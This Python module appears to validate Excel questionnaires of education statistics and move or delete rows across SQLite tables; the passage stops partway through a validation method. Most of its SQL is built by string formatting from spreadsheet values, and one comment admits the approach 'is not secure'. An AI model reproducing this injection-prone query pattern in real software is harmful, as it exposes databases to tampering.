+{"seq_id":"1795196688","text":"# import sqlite3 #sql connection\nimport xlrd #to read excel file\nfrom xlrd import open_workbook\nimport re\nimport collections #enable namedtuple: varname = collections.namedtuple('varname','val1, val2, val3..') and ordered dic\nimport sys, json\nimport os\nfrom functools import reduce\nimport shutil\nimport datetime\nfrom itertools import chain\nimport time\nfrom time import sleep\nfrom rmsqlfunctions import *\n\n# if ( re.search('\\\\\\\\Tests\\\\\\\\mo$',os.getcwd()) or re.search('/Tests/os$',os.getcwd()) or\n # re.search('/Tests/mo$',os.getcwd()) ):\n# with open(\"../../Libraries/variables_for_preprocessing.json\") as f:\n# pre_vars=json.loads(f.read())\n# else:\nwith open(\"Libraries/variables_for_preprocessing.json\") as f:\n pre_vars=json.loads(f.read())\n\n####DATA EXTRACTION\n#-----------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------\n# def getADM_CODE(co_code):\n# \"\"\" SQL extract of ADM codes.\"\"\"\n# sql_str = 'Select ADM_CODE from REGIONS where CO_CODE ={0}'.format(co_code)\n# sql_str = sql_query(sql_str)[0]\n\ndef getADM_DISTINCT(co_code,year):\n \"\"\" SQL extract distinct number of ADM(s).\"\"\"\n sql_str = 'SELECT COUNT(ADM_CODE) FROM REGIONS WHERE CO_CODE={0} AND MC_YEAR={1}'.format(co_code, year)\n query = sql_query(sql_str)[0]\n return(query[0])\n \ndef getCO_CODE(country_name):\n \"\"\" SQL extract a country code given the long or short name.\n\n If the exact country name is found, it gives back the code,\n otherwise it returns None.\n \"\"\"\n name = country_name.upper().replace(\"'\", \"''\")\n sql_str = (\"SELECT CO_CODE FROM COUNTRY \"\n \" WHERE UPPER(CO_LONG_NAME) IS '{0}' \"\n \" OR UPPER(CO_SHORT_NAME) IS '{0}' \".format(name))\n code = sql_query(sql_str)\n if code:\n return(code[0][0])\n \ndef getCO_NAME(co_code, short=True):\n \"\"\" SQL extract a country name given the country code.\n\n If the country name is found it returns it, otherwise it returns None.\n \"\"\"\n if short:\n var = 'CO_SHORT_NAME'\n else:\n var = 'CO_LONG_NAME'\n sql_str = (\"SELECT {0} FROM COUNTRY \"\n \" WHERE CO_CODE ={1} \".format(var , co_code))\n code = sql_query(sql_str)\n if code:\n return(code[0][0])\n\ndef getAvailable_countries():\n \"\"\" SQL extract the tuple of the available countries.\"\"\"\n sql_str = (\"SELECT DISTINCT b.CO_SHORT_NAME FROM REGIONS as a \"\n \"left join COUNTRY as b on a.CO_CODE = b.CO_CODE \"\n \"where a.ADM_CODE >0 order by b.CO_SHORT_NAME\")\n res = sql_query(sql_str)\n if res:\n return(res)\n\ndef getAvailable_year(co_name):\n \"\"\" SQL extract data year(s) of the submitted questionnaires.\"\"\"\n name = co_name.upper().replace(\"'\", \"''\")\n\n sql_str = (\"SELECT DISTINCT A.EMCO_YEAR FROM EDU_METER97_REP AS A \"\n \"LEFT JOIN COUNTRY AS B ON B.CO_CODE = A.CO_CODE \"\n \"WHERE UPPER(B.CO_SHORT_NAME) IS UPPER('{0}') order by A.EMCO_YEAR\".format(name)) #900001 == Pop.Ag0t99\n code = sql_query(sql_str)\n if code:\n return(list(chain.from_iterable(code)))\n\n####DATA INSERTION\n#-----------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------\ndef moveSerie(co_code, year, from_serie, to_serie):\n \"\"\" SQL moving of data between series, from/to REP, OBS or EST.\n \n So far, it modifies the following 3 SQL table:\n 1 - 
EDU_METER97_{}\n 2 - EDU_INCLUSION{}\n 3 - EDU_FTN97_{}\n 4 - EDU_COMMENT_TABLE_{}\n\"\"\"\n ### Move EDU_METER97\n ## Current year\n print('Moving data for {0}-{1}'.format(co_code, year))\n ### Deleting existing data\n sql_query((\"DELETE FROM EDU_FTN97_{0} where CO_CODE ={1} and \"\n \"((EMCO_YEAR ={2} and EMC_ID in (select EMC_ID from RM_Mapping where CUR_YEAR=0)) OR \"\n \"(EMCO_YEAR ={3} and EMC_ID in (select EMC_ID from RM_Mapping where CUR_YEAR=0)))\".format(to_serie, co_code,year, year -1)))\n sql_query((\"DELETE FROM EDU_INCLUSION_{0} where CO_CODE ={1} and \"\n \"((EMCO_YEAR={2} and EMC_ID in (select EMC_ID from RM_Mapping where CUR_YEAR = 0)) OR \"\n \"(EMCO_YEAR={3} and EMC_ID in (select EMC_ID from RM_Mapping where CUR_YEAR = -1 )))\".format(to_serie, co_code,year, year -1)))\n for ind in [0,-1]:\n meter = (\"INSERT OR REPLACE INTO EDU_METER97_{3} \"\n \"SELECT a.* FROM RM_Mapping as b \"\n \"left join EDU_METER97_{2} as a on a.EMC_ID = b.EMC_ID and b.CUR_YEAR ={4} \"\n \"where a.co_code ={0} \"\n \"and a.EMCO_YEAR ={1}\".format(co_code, year + ind, from_serie, to_serie,ind))\n ### Moving EDU_INCLUSION\n ### Current year\n inclu= (\"INSERT OR REPLACE INTO EDU_INCLUSION_{3} \"\n \"SELECT a.* FROM RM_Mapping as b \"\n \"join EDU_INCLUSION_{2} as a on a.EMC_ID = b.EMC_ID and b.Cur_Year = {4} \"\n \"where a.co_code ={0} \"\n \"and a.EMCO_YEAR ={1}\".format(co_code, year + ind, from_serie, to_serie,ind))\n ### Current year\n ftn = (\"INSERT OR REPLACE INTO EDU_FTN97_{3} \"\n \"SELECT a.* FROM RM_Mapping as b \"\n \"left join EDU_FTN97_{2} as a on a.EMC_ID = b.EMC_ID and b.CUR_YEAR = {4} \"\n \"where a.co_code = {0} \"\n \"and a.EMCO_YEAR = {1}\".format(co_code, year + ind, from_serie, to_serie,ind))\n sql_query(meter,False)\n sql_query(inclu, False)\n sql_query(ftn,False)\n\n print(\"Moved METER, INCLU and FTN tables from {0} to {1}\".format(from_serie, to_serie))\n\n ### Moving EDU_COMMENT_TABLE\n ### Current year\n sql_query(\"DELETE FROM EDU_COMMENT_TABLE_{0} where CO_CODE ={1} and EMCO_YEAR = {2} and WT_NAME in (select RM_TABLE from RM_Mapping_NonNumeric)\".format(to_serie, co_code,year))\n table_com = (\"INSERT OR REPLACE INTO EDU_COMMENT_TABLE_{3} \"\n \"SELECT a.* FROM RM_Mapping_NonNumeric as b \"\n \"join EDU_COMMENT_TABLE_{2} as a on a.WT_NAME = b.RM_TABLE \"\n \"where a.co_code = {0} \"\n \"and a.EMCO_YEAR = {1}\".format(co_code, year, from_serie, to_serie))\n sql_query(table_com, False)\n\n print(\"Moved COMMENT_TABLE table from {0} to {1}\".format(from_serie, to_serie))\n \n\ndef delete_questionnaire(co_code, year):\n \"\"\" Delete all questionnaire data and indicators\"\"\"\n ## REP\n sql_query(\"DELETE FROM EDU_METER97_REP WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_METER97_NonNumeric_REP WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_INCLUSION_REP WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_COMMENT_TABLE_REP WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_FTN97_REP WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n ##OBS\n sql_query(\"DELETE FROM EDU_METER97_OBS WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_METER97_NonNumeric_OBS WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_INCLUSION_OBS WHERE CO_CODE = 
{0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_COMMENT_TABLE_OBS WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_FTN97_OBS WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n ## EST\n sql_query(\"DELETE FROM EDU_METER97_EST WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_METER97_NonNumeric_EST WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_INCLUSION_EST WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_COMMENT_TABLE_EST WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_FTN97_EST WHERE CO_CODE = {0} AND EMCO_YEAR = {1};\".format(co_code, year), False)\n ## Indic and audit trail\n sql_query(\"DELETE FROM METER_AUDIT_TRAIL WHERE CO_CODE = {0} AND MC_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM EDU_INDICATOR_EST WHERE CO_CODE = {0} AND IND_YEAR = {1};\".format(co_code, year), False)\n sql_query(\"DELETE FROM INDICATOR_AUDIT_TRAIL WHERE CO_CODE = {0} AND IND_YEAR = {1};\".format(co_code, year), False)\n ## Regions\n sql_query(\"DELETE FROM REGIONS WHERE CO_CODE = {0};\".format(co_code), False)\n \n####MISC\n#-----------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------\n\ndef indexes(cellname):\n \"\"\"This function returns a vector with the indices of a cell given its name.\n\n For example if cellname='A1' it returns [0,0].\n \"\"\"\n match1 = re.search('[A-Z]+',cellname)\n col_name = match1.group()\n N = len(col_name)\n col_index = 0\n for index in range(N):\n col_index = col_index+(ord(col_name[index])-ord('A')+1)*26**(N-1-index)\n match2 = re.search('[0-9]+',cellname)\n row_index = int(match2.group())\n return [row_index-1,col_index-1]\n\ndef indexes_inverse(xlrd_coordinates):\n \"\"\"Returns excel coordinates given a vector with xlrd coordinates.\n\n It works for a maximum of two letters in the column name.\n \"\"\"\n # The following gives the number of letters\n column_letter=\"\"\n quotient=int(xlrd_coordinates[1] / 26 )\n letter_number= xlrd_coordinates[1] % 26\n if(quotient):\n column_letter= chr(ord('A')+ (quotient-1))\n column_letter = column_letter + chr( ord('A') + letter_number )\n xl_reference=column_letter + str( xlrd_coordinates[0] + 1 )\n return(xl_reference)\n\ndef is_reference(cell_value):\n \"\"\"Checks if a value is a reference to another cell.\n\n This functions receives a string, and checks if it has the form\n X[a:b]. If yes, it returns [a,b], else it returns None. 
\n If it has the form X[:b] it returns [None,b].\n If it is only X, it returns the string \"empty_reference\"\n \"\"\"\n if type(cell_value) in [int,float]:\n return(None)\n match=re.search('[Xx]\\[([0-9]*):([0-9]+)\\]$|[Xx]',cell_value)\n if not (match==None):\n reference=list(match.groups())\n if reference[1]==None:\n return(\"empty_reference\")\n if reference[0]=='':\n reference[0]=None\n else:\n reference[0]=int(reference[0])\n reference[1]=int(reference[1])\n return( reference )\n else:\n return(None)\n\ndef ec_td_id(sheet_name):\n \"\"\"Returns the EC_TD_ID given the sheet name.\n \"\"\"\n if sheet_name == \"Administrative divisions\":\n return(1)\n elif sheet_name == \"Pupils\":\n return(3)\n else:\n return(2)\n\n\ndef mg_id(cell_value):\n \"\"\"This function gets the MG_ID for the read data\n\n This works for the meters table only. Reading a number will return\n an empty string.\n\n \"\"\"\n if((type(cell_value) == int or type(cell_value) == float) ):\n if cell_value>0:\n return(\"\")\n else:\n return(1)\n elif is_reference(cell_value):\n return(3)\n else:\n match_old_nil=re.search('[Nn]$',cell_value)\n match_not_applicable=re.search('[Aa]$|^[Zz]$',cell_value)\n match_missing=re.search('^ *$|^[Mm] *',cell_value)\n if (not (match_old_nil == None)):\n return(1)\n elif (not (match_not_applicable == None) ):\n return(6)\n elif (not (match_missing == None)):\n return(\"D\")\n \n\n####DATA EXTRACTION CLASS\n#-----------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------\n\n\nclass questionnaire:\n \"\"\"Defines questionnaire properties and methods\n \n Attributes:\n wb = the workbook that correspond to the class.\n conn = connection object to the database\n emco_year = the emco_year read from the workbook.\n nadm1 = number of administrative divisions in the file\n country_name = the name of the country that filled the questionnaire.\n country_code = the code of the country.\n edit_mode = True or False, whether the class if going to be used for editing existing data.\n missing_data_dictionary = Dictionary whose keys are sheet names. The values are another dictionary \n whose keys are table names and values column numbers. 
These column numbers \n contain missing values.\n data_issues_dictionary = Similar to missing data dictionary, but it has three levels of dicionaries.\n sheet name : table name : data issue type : issue information.\n \"\"\"\n def set_workbook(self,excel_file):\n \"\"\"Set the workbook\n\n excel_file should be the full path to the excel file.\n \"\"\"\n self.wb=open_workbook(excel_file)\n\n def set_database_connection(self,database_file):\n \"\"\"Sets the connection to the database.\"\"\"\n self.conn=sqlite3.connect(database_file)\n\n def get_emco_year(self):\n \"\"\"Sets the attribute emco_year.\"\"\"\n if self.edit_mode:\n sheet=self.wb.sheets()[0]\n self.emco_year= sheet.cell(2,1).value\n if (type(self.emco_year) in [int,float] and self.emco_year>0 ):\n self.emco_year=int(self.emco_year)\n else:\n self.emco_year=False\n else:\n # # Old way \n # front_page_variables = pre_vars['fixed_sheets']['Front Page']\n # sheet = self.wb.sheet_by_name('Front Page')\n # self.front_page_year = int(sheet.cell( *indexes( front_page_variables['school_year_ending'][0] ) ).value)\n # # New way\n sheet=self.wb.sheet_by_name('Policy information')\n self.emco_year=sheet.cell(*indexes('M14')).value\n \n def get_nadm1(self):\n \"\"\"Sets the attribute nadm1 based on the questionnaire.\"\"\"\n if self.edit_mode:\n sheet=self.wb.sheets()[0]\n self.nadm1= sheet.cell(4,1).value\n if (type(self.nadm1) in [int,float] and self.nadm1>0 ):\n self.nadm1=int(self.nadm1)\n else:\n self.nadm1=False\n else:\n administrative_divisions_variables = pre_vars['fixed_sheets']['Administrative divisions']\n sheet = self.wb.sheet_by_name('Administrative divisions')\n try:\n self.nadm1 = sheet.cell( *indexes( administrative_divisions_variables['adm1_number'][0] ) ).value\n except(IndexError):\n self.nadm1 = False\n \n if (type(self.nadm1) in [int,float] and self.nadm1>0 ):\n self.nadm1=int(self.nadm1)\n else:\n self.nadm1=False\n\n def get_country_name(self):\n \"\"\"Sets the country name based on the front page of the questionnaire.\"\"\"\n if self.edit_mode:\n sheet=self.wb.sheets()[0]\n self.country_name = sheet.cell( 0,1 ).value\n else:\n front_page_variables = pre_vars['fixed_sheets']['Front Page']\n sheet = self.wb.sheet_by_name('Front Page')\n self.country_name = sheet.cell( *indexes( front_page_variables['country_name'][0] ) ).value\n \n def get_database_type(self):\n \"\"\"Sets the database type (OBS,REP,EST).\n\n If it is an edited questoinnaire it reads the database type\n from the information section that is in the upper right part\n of each sheet.\n\n If it is a new questionnaire it will take the value REP.\n \"\"\"\n if self.edit_mode:\n sheet=self.wb.sheets()[0]\n self.database_type = sheet.cell( 5,1 ).value\n else:\n self.database_type='REP'\n \n def get_country_code(self):\n \"\"\"Sets the country code by looking in the COUNTRY table.\n\n This function searches the country code in the COUNTRY table\n using the self.country_name variable of the class. It assumes\n that there will be an exact match up to case. 
If this is not\n the case it returns None.\n \"\"\"\n name=self.country_name.upper()\n # The following is necessary for compatibility with sql syntax\n name=\"'\"+re.sub(\"'\",\"''\",name)+\"'\"\n cursor=self.conn.cursor()\n #The following is not working so I am using .format, but this is not secure\n# cursor.execute(u'SELECT CO_CODE FROM COUNTRY WHERE UPPER(CO_LONG_NAME) IS ?', (name,) )\n cursor.execute(\"SELECT CO_CODE FROM COUNTRY WHERE UPPER(CO_LONG_NAME) IS {0};\".format(name) )\n country_code=cursor.fetchone()\n if(country_code==None):\n self.country_code=0\n else:\n self.country_code=country_code[0]\n cursor.close()\n\n def emc_id(self,table_name,column):\n \"\"\"Returns the emc_id given the table and column number.\n \"\"\"\n cursor=self.conn.cursor()\n cursor.execute(\"SELECT EMC_ID FROM RM_MAPPING WHERE RM_TABLE=\\\"{0}\\\" AND Col={1};\".format(table_name,column ) )\n return(cursor.fetchone()[0])\n \n def check_nadm1(self):\n \"\"\"Checks that number of administrative divisions is filled with a positive integer. \n \"\"\"\n if( (type(self.nadm1) == int or type(self.nadm1) == float) and int(self.nadm1)==self.nadm1 and self.nadm1 > 0 ):\n self.print_log(\"Number of administrative divisions: {0}\\n\".format(self.nadm1))\n return(True)\n else:\n self.print_log(\"Error: Wrong value for number of administrative divisions.\\n\")\n return(False)\n\n def check_adm1_label(self):\n \"\"\"Checks that the name of administrative divisions are not empty. \"\"\"\n if self.edit_mode:\n return(True)\n else:\n administrative_divisions_variables = pre_vars['fixed_sheets']['Administrative divisions']\n sheet = self.wb.sheet_by_name('Administrative divisions') \n adm1_label = sheet.cell( *indexes( administrative_divisions_variables['adm1'][0] ) ).value \n if( (type(adm1_label) == str) and adm1_label ):\n self.print_log(\"ADM1 name provided: {0}\\n\".format(adm1_label))\n return(True)\n else:\n self.print_log(\"Error: ADM1 name not provided.\\n\")\n return(False)\n\n \n def check_adm1_names(self):\n \"\"\"Checks that the administrative division names are filled.\"\"\"\n if (self.edit_mode):\n return(True)\n elif (not self.nadm1):\n return(False)\n else:\n administrative_divisions_variables = pre_vars['fixed_sheets']['Administrative divisions']\n sheet=self.wb.sheet_by_name('Administrative divisions')\n id_start_coordinates=indexes( administrative_divisions_variables['id_start'][0])\n regions_names=sheet.col_values(id_start_coordinates[1]+1,\\\n id_start_coordinates[0],\\\n id_start_coordinates[0]+self.nadm1)\n all_regions_good=reduce( lambda x,y: x and y,\n ##The following line tests wether it is not empty and different that ...\n map( lambda region_name: region_name and region_name != \"...\" , \n regions_names))\n if (all_regions_good):\n self.print_log(\"Administrative divisions:\\n\")\n for region in regions_names:\n self.print_log(\" {}\\n\".format(region))\n self.print_log(\"\\n\")\n else:\n self.print_log(\"Error: Empty names for administrative divisions.\")\n return(all_regions_good)\n\n def check_reference_year(self):\n \"\"\"Checks that the reference year is filled with the right value.\"\"\"\n if (self.edit_mode):\n return(True)\n else:\n sheet=self.wb.sheet_by_name('Policy information')\n reference_year=sheet.cell(*indexes('M14')).value\n test_value= type(reference_year) == float or type(reference_year) == int\n if (test_value):\n self.print_log(\"Reference year: {0}\\n\".format(int(reference_year)))\n else:\n self.print_log(\"Error: Reference year not filled.\\n\")\n 
return(test_value)\n\n def check_front_page_year(self):\n \"\"\"Checks that the reference year is filled with the right value.\"\"\"\n if (self.edit_mode):\n return(True)\n else:\n front_page_variables = pre_vars['fixed_sheets']['Front Page']\n sheet = self.wb.sheet_by_name('Front Page')\n front_page_year = int(sheet.cell( *indexes( front_page_variables['school_year_ending'][0] ) ).value)\n test_value= type(front_page_year) == float or type(front_page_year) == int\n if (test_value):\n self.print_log(\"Front page - school year ending : {0}\\n\".format(int(front_page_year)))\n else:\n self.print_log(\"Error: Front page school year ending year not filled.\\n\")\n return(test_value)\n\n \n\n def check_country_name(self):\n \"\"\"Checks if the country name is filled.\"\"\"\n if (self.edit_mode):\n code_test=self.country_code\n if(not code_test ):\n self.print_log(\"Error: Country name was not found in the database.\\n\")\n return(code_test)\n else:\n front_page_variables=pre_vars['fixed_sheets']['Front Page']\n cellname=front_page_variables['country_name'][0]\n sheet=self.wb.sheet_by_name('Front Page')\n country_name=sheet.cell(*indexes(cellname)).value\n test_value=sheet.cell_type( *indexes(cellname) ) == front_page_variables['country_name'][1]\n code_test=self.country_code\n if (not test_value ):\n self.print_log(\"Error: Country name is not filled or has a wrong format.\\n\")\n elif(not code_test ):\n self.print_log(\"Error: Country name was not found in the database.\\n\")\n else:\n self.print_log(\"Country name is filled: {0}\\n\".format(country_name))\n return(test_value and code_test)\n \n def check_number_of_sheets(self):\n \"\"\"Checks the number of sheets in the excel file.\n\n For an edited questionnaire it returns True. For an original\n questoinnaire it checks if it has the same number of sheets\n than the questionnaire originally provided.\n \"\"\"\n if (self.edit_mode):\n return(True)\n else:\n if pre_vars['nsheets']==self.wb.nsheets:\n self.print_log(\"The correct number of sheets\"+ \"({})\".format(self.wb.nsheets) +\"has been submitted.\\n\")\n return(True)\n else:\n self.print_log(\"Error: Incorrect number of sheets submitted\\n\")\n return(False)\n \n def check_edited_configuration_part(self):\n \"\"\"Checks wether the questionnaire information is present in an edited questionnaire.\n\n This functions checks that the information table in the top\n left corner of the sheet exists and is an edited questionnaire.\n\n \"\"\"\n if (self.edit_mode):\n sheet=self.wb.sheets()[0]\n configuration_names=sheet.col_values(0,0,7) # names in the configuration (country, co_code, year,etc.). i.e. first column\n configuration_values=sheet.col_values(1,0,7) # values of the configuration, i.e. second column\n # test1 is to check if the names coincide with the exported ones\n test1= configuration_names == ['Country', 'CO_CODE', 'Year', 'Data', 'No.ADM', 'Series','Mode']\n # test2 is to check that the values are not empty (May be it could be improved). 
\n test2=reduce( lambda x,y: x and y, configuration_values)\n # test3 is to check that it is Edit mode and not Read only\n test3= configuration_values[6] == \"Edit\"\n test4=self.emco_year\n test5=self.database_type in ['OBS','REP','EST']\n test_value=test1 and test2 and test3 and test4 and test5\n if ( not ( test1 and test2 ) ):\n self.print_log(\"Error: Configuration section has wrong values.\\n\")\n elif( not test3 ):\n self.print_log(\"Error: Edited questionnaire is in read-only mode.\\n\")\n elif(not test4 ):\n self.print_log(\"Error: Non valid emco year.\\n\")\n elif(not test5 ):\n self.print_log(\"Error: Non valid database type.\\n\")\n else:\n self.print_log(\"Configuration section of edited questionnaire is properly filled\\n\") \n return(test_value)\n else:\n return(True)\n\n\n def check_one_value(self,value):\n \"\"\"Checks that value (the argument) is proper.\n \n This function can return the following values:\n 0 if there is an error.\n 1 if the value is OK.\n 2 accept but write error (A or N).\n 3 if there is an X with no reference.\n 4 if there is a missing value.\n \"\"\"\n return_value=0\n if((type(value) == int or type(value) == float) and value >=0 ):\n return_value=1\n elif(type(value) == str):\n #Accept regexp\n match1=re.search('[Xx]\\[[0-9]*:[0-9]+\\]|^[Zz]$',value)\n # Accept with error regexp\n match2=re.search('[Aa]$|^[Nn]$',value)\n # Undefined reference\n match3=re.search('^[Xx] *$',value)\n # Missing value\n match4=re.search('^ *$|^[Mm] *',value) \n if ( not (match1==None) ):\n return_value=1 \n elif ( not (match2==None) ):\n return_value=2\n elif ( not (match3==None) ):\n return_value=3\n elif ( not (match4==None) ):\n return_value=4 \n return(return_value)\n \n def add_missing_column(self,sheet_name,table,column):\n \"\"\"Adds a columns to the missing values dictionary.\"\"\"\n if (sheet_name in self.missing_data_dictionary.keys()):\n existing_tables_dict=self.missing_data_dictionary[sheet_name]\n if (table in existing_tables_dict):\n ## Checks go column by column, so it is not necessary\n ## to check if a column has already been added ot to\n ## use sets.\n existing_tables_dict[table]= existing_tables_dict[table] + [column]\n else:\n existing_tables_dict[table]=[column]\n else:\n self.missing_data_dictionary[sheet_name]={table:[column]}\n\n def add_data_issues(self,sheet_name,table,issue_type,relevant_data):\n \"\"\"Adds information to the data issues dictionary.\n \n\n There are 4 types of data issues: 'undefined_reference','check_less','column_sums','region_totals'.\n \n For 'check_less' relevant_data is [smaller_column bigger_column [ list of rows with problems] ].\n For 'undefined_reference' it is the column number.\n For 'column_sums' [[summands_columns],total_column,[row_problems]].\n For 'region_totals' it is the column number.\n \"\"\"\n if (sheet_name in self.data_issues_dictionary.keys()):\n existing_tables_dict=self.data_issues_dictionary[sheet_name]\n if (table in existing_tables_dict.keys()):\n existing_issues_dict=existing_tables_dict[table]\n if (issue_type in existing_issues_dict.keys() ):\n existing_issues_dict[issue_type] = existing_issues_dict[issue_type] + [relevant_data]\n else:\n existing_issues_dict[issue_type] = [relevant_data]\n else: \n existing_tables_dict[table] = {issue_type : [relevant_data]}\n else:## sheet_name in dictionay\n self.data_issues_dictionary[sheet_name] = {table : { issue_type: [relevant_data]}}\n\n \n def check_values(self):\n \"\"\"Checks that all the values in the questionnare are proper.\n\n This function 
returns false if there is at least one improper\n value in the questionnaire. In other words, if there is at\n least one value for which the function check_one_value returns\n 0. In this case it will also print the column and table name\n for all the improper values. \n\n If all the values are proper, but there are A or N's, it will\n print the column and table name where these ones are.\n\n If there are undefined references, they are added to the data\n issues dictionary and it prints a message saying that the\n questoinnaire contains undefined references.\n\n If there are missing values, it adds their column to the\n missing data dictionary and it prints a message saying that\n there are missing values in the questionnaire.\n\n \"\"\"\n edit_sheets_names=self.wb.sheet_names()\n cursor=self.conn.cursor()\n query=\"SELECT Tab,EXL_REF,RM_TABLE,Col FROM RM_MAPPING WHERE Tab in (\" + ','.join('?'*len(edit_sheets_names)) + \") AND AC!='ADM_NAME';\"\n #self.print_log(\"Checking that all the values are proper...\") \n cursor.execute(query, edit_sheets_names )\n mapping_table = cursor.fetchall()\n overall_test=1\n overall_missing=False\n overall_undefined_references=False\n for variables in mapping_table:\n table=variables[2]\n col_number=variables[3]\n sheet = self.wb.sheet_by_name(variables[0])\n meter_starting_index = variables[1]\n meter_starting_coordinates = indexes(meter_starting_index)\n ## We read the values for the regions\n meter_values = sheet.col_values(meter_starting_coordinates[1],\\\n meter_starting_coordinates[0],\\\n meter_starting_coordinates[0]+self.nadm1)\n ## We read the country value.\n meter_value_country=sheet.cell( meter_starting_coordinates[0]+self.nadm1+1,\\\n meter_starting_coordinates[1]).value\n meter_values=[meter_value_country]+meter_values\n # The following will be zero if there is at least one\n # error. 
1 if everything is ok and 2 id there is at least one A or N.\n values_test=list(map( self.check_one_value,meter_values ))\n no_errors_test= 0 not in values_test\n if (0 in values_test):\n self.print_log(\"Error: Column {0} in {1} has improper values.\\n\".format(col_number,table))\n if (2 in values_test):\n self.print_log(\"Error: Column {0} in {1} has at least one A or N.\\n\".format(col_number,table))\n if (3 in values_test):\n #self.print_log(\"Error: Column {0} in table {1} has at least one undefined reference.\\n\".format(col_number,table))\n overall_undefined_references=True\n self.add_data_issues(variables[0],table,'undefined_reference',col_number )\n if (4 in values_test):\n #self.print_log(\"Error: Column {0} in table {1} has at least one missing value.\\n\".format(col_number,table))\n overall_missing=True\n self.add_missing_column(variables[0],table,col_number)\n # Next, add option for X.\n \n overall_test=overall_test and no_errors_test\n if overall_missing:\n self.print_log(\"Warning: The questionnaire contains missing values.\\n\")\n if overall_undefined_references:\n self.print_log(\"Warning: The questionnaire contains undefined references.\\n\")\n return(overall_test)\n \n def print_log(self,text_string,log_type=False):\n \"\"\" Puts the test in log and stdout.\n\n \"\"\"\n print(text_string,end='')\n if (not log_type): \n self.validation_log_file.write(text_string)\n self.validation_log_file.flush()\n os.fsync(self.validation_log_file.fileno())\n # else:\n # self.error_log_file.write(text_string)\n # self.error_log_file.flush()\n # os.fsync(self.error_log_file.fileno())\n\n \n\n def validation(self):\n \"\"\"Validation step for a questionnare.\n\n It makes the following checks:\n 1. Checks that tne number of administrative divisions is filled (method: check_nadm1).\n 2. Checks that the label of administrative divisions is filled (e.g. state, province, etc. ). (method: check_adm1_label)\n 3. Checks that the name of each administrative division is filled. (method: check_adm1_names)\n 4. Checks that the reference year is properly filled (Cell M14 from Administrative divisions). (method: check_reference_year)\n 5. Checks that the country name is filled. (method: check_country_name)\n 6. For an original questionnaire checks if the number of sheets in the questionnaire corresponds \n to the provided questionnaire. ( method: check_number_of_sheets )\n 7. For an edited questionnaire checks that the information section in the upper left corner exists. (method: check_edited_configuration_part) \n 8. Checks that all the values are proper. (method: check_values)\n\n If any of theses tests does not pass, this method returns False. 
Otherwise it returns True.\n \"\"\"\n check_variables=pre_vars[\"Checking sheet\"]\n self.print_log(\"----------\"+\"Date: \"+datetime.datetime.now().strftime(\"%B %d, %Y\")+\"----------\\n\")\n self.print_log(\"VALIDATION STEP\\n\\n\")\n if (not self.edit_mode):\n self.print_log(\"Original questionnaire submitted with path:\\n\")\n self.print_log(self.excel_file+\"\\n\\n\")\n administrative_divisions_variables=pre_vars['fixed_sheets']['Administrative divisions']\n else:\n self.print_log(\"Edited questionnaire submitted with path:\\n\")\n self.print_log(self.excel_file+\"\\n\\n\")\n\n nadm1_test=self.check_nadm1()\n adm1_label_test=self.check_adm1_label()\n adm1_names_test=self.check_adm1_names()\n front_year_test=self.check_front_page_year()\n reference_year_test=self.check_reference_year()\n country_name_test=self.check_country_name()\n number_of_sheets_test=self.check_number_of_sheets()\n edited_configuration_part_test=self.check_edited_configuration_part()\n values_test=self.check_values()\n print(\"\\n----------Questionnaire Validation finished.----------.\\n\")\n self.validation_log_file.close()\n return ( nadm1_test and adm1_label_test and adm1_names_test and front_year_test and reference_year_test and country_name_test and number_of_sheets_test and edited_configuration_part_test and values_test )\n\n def check_region_totals(self):\n \"\"\"Checks that the sum of the values of the regions adds up to the country total.\n\n For each emc_id in the table RM_Mapping it checks if the sum\n of the region values adds up to the country total. If this is\n the case it returns True, otherwise it returns False.\n\n \"\"\"\n cursor=self.conn.cursor()\n edit_sheets_names=self.wb.sheet_names()\n pass_test=True\n self.print_log(\"Checking that region values add to the country value...\", True)\n cursor.execute(\"SELECT Tab,EXL_REF,RM_TABLE,Col FROM RM_MAPPING;\") \n mapping_info=cursor.fetchall()\n for variables in mapping_info: \n tab=variables[0]\n if tab not in edit_sheets_names:\n continue\n exl_ref=variables[1]\n table=variables[2]\n col=variables[3]\n sheet = self.wb.sheet_by_name(tab)\n meter_starting_coordinates = indexes(exl_ref)\n ## Regional values\n meter_values = sheet.col_values(meter_starting_coordinates[1],\\\n meter_starting_coordinates[0],\\\n meter_starting_coordinates[0]+self.nadm1)\n ## Country value\n meter_value_country=sheet.cell( meter_starting_coordinates[0]+self.nadm1+1,\\\n meter_starting_coordinates[1]).value\n ## If there are missing values or references we do not\n ## make any check.\n all_numbers = reduce(lambda x,y: x and y,\n map( lambda x: x in [int,float], \n map(lambda x: type(x) , meter_values))\n )\n if (all_numbers):\n regions_sum=reduce(lambda x,y : x+y, meter_values)\n if (regions_sum != meter_value_country):\n ## Error para el log\n if pass_test:\n 